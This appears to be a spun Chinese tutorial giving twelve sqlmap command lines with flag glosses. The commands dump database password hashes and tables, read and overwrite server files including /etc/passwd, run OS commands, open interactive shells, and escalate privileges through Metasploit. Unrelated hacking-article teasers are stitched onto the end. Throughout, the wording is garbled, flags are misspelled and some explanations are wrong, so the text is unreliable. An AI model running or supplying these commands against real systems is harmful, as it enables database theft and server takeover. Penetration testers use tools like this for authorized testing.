坚信许多都了解Sqlmap,可是却不清楚怎样根据sqlmap来引入对不对?
今日将实战演练教大伙儿怎样真实的应用sqlmap来引入?要是了解这12种方式,包你只必须应用Sqlmap这一个专用工具把握这12种使用 *** 就能打遍天下打遍天下;
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.php?id=1 -f -b --current-user --current-db --users --passwords --dbs -v 0
-u 总体目标详细地址
-f 普遍指纹识别后端开发DBMS
-b 查找DBMS条幅
--current-user 查找当今对话客户
--current-db 查找当今数据库查询
--users 枚举类型数据库查询客户
--passwords 枚举类型数据库查询客户登陆密码散列
--dbs 枚举类型能用的数据库查询
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/oracle/get_int.php?id=1 -b --passwords -U CU --union-use -v 2
-u 总体目标详细地址
-b 查找DBMS条幅
--passwords 枚举类型数据库查询客户登陆密码散列
-U 特定数据库查询客户(cu,当今客户的别称)
--unlon-use 假如将会,根据联合查询sql注入查找数据信息
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_str2.asp?name=fujieace --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2
-u 总体目标详细地址
--dump 复印表项
-T 复印表(users)
-C 复印列(surname)
--start 之一个项键入(2,第二个报表顶端)
--stop 最终一项键入(3,第三个报表顶端)
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --dump -C 'user.pass' -v 1 --exclude-sysdbs
-u 总体目标详细地址
--dump 复印表项
-C 复印列(user.pass)
-v VERBOSE 详尽水平级別:0-6(初始值1)
--exclude-sysdbs lgnore系统软件数据库查询(e.g.information_schema)
留意:沒有出示table名(-T选择项)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/oracle/get_int.php?id=1 --sql-shell -v 2
-u 总体目标详细地址
--sql-shell 造成一个互动式的sql shell
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_int.asp?id=1 --read-file "c:\example.txt" -v 2
-u 总体目标详细地址
--read-file 文档以从更底层系统文件载入
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --write-file /etc/passwd --dest-file /tmp/writetest -v 2
-u 总体目标详细地址
--write-file 上传文件到更底层系统文件(/ etc / passwd)
--dest-file 肯定系统文件相对路径载入(/ tmp / writetest)
-v VERBOSE 详尽水平级別:0-6(初始值1)
< p>python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/get_int.php?id=1 --os-cmd "id" -v 1
-u 总体目标详细地址
--os-cmd 电脑操作系统指令实行(id)
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.aspx?id=1 --os-shell -v 1 --union-use
-u 总体目标详细地址
--os-shell 转化成互动式命令提示符
---union-usea 假如将会得话,根据联合查询SQL引入应用petrieve数据信息
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/pgsql/iis/get_int.aspx?id=1 --os-pwn --msf-path /home/inquis/software/metasploit --priv-esc -v 1
-u 总体目标详细地址
--os-pwn 创建客户和数据库查询集群服务器的带外连接
--msf-path metasploit系统文件相对路径(/home/inquis/software/metasploit)
--prive-esc 试着将数据库查询过程的用户权限提高到系统软件
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mysql/get_int.php?id=1 --os-pwn --msf-path /home/inquis/software/metasploit -v 1
-u 总体目标详细地址
--os-pwn 创建客户和数据库查询集群服务器的带外连接
--msf-path metasploit系统文件相对路径(/home/inquis/software/metasploit)
-v VERBOSE 详尽水平级別:0-6(初始值1)
python /usr/bin/sqlmap.py -u https://www.fujieace.com/mssql/iis/get_int.asp?id=1 --os-bof -v 1 --mst-path ~/software/metasploit
-u 总体目标详细地址
--os-bof 根据运用微软公司sql *** 服务器跨站脚本攻击(MS09-04)创建客户和数据库查询集群服务器的带外连接,
--msf-path metasploit系统文件相对路径(/home/inquis/software/metasploit)
-v VERBOSE 详尽水平级別:0-6(初始值1)
前言:本文翻译自sans.org,有删节。在学习sulley的过程中发现中文参考资料很少,所以抛砖引玉翻译一下,希望对学习协议fuzz测试的同学有帮助。本文适合作为学习sulley协议测试过程中参...
什么叫Splunk? Splunk捕捉,数据库索引,随后关系可检索的储存库文件的数据信息,从这当中能够 转化成汇报,图型,报警,数据可视化和汽车仪表板。被觉得是最好是的安全工器具之一,这个东西的纯碎...
1、肉食鸡: 说白了“肉食鸡”是一种很品牌形象的形容,形容这些能够随便被大家操纵的电脑上,另一方能够是WINDOWS系统软件,还可以是UNIX/LINUX系统软件,能够是一般的个人计算机,还可以是大...
NO.1:黑客基地 站长:孤独剑客,中国黑客界第二代黑客泰斗人物。 他的名字已经在黑客界家喻户晓。他正演绎属于他自己的黑客生涯,同时他用自身的技术实力征服着每个向往黑客的人。黑客基地自2003年...
immunity debugger 翻译中文也可了解为“免疫力程序调试”; 什么是免疫程序调试? 免疫系统疾病CANVAS pentesting专用工具能够用于检测你的系统软件真的是多...
XSS又叫CSS (Cross-Site Script) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码 当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用...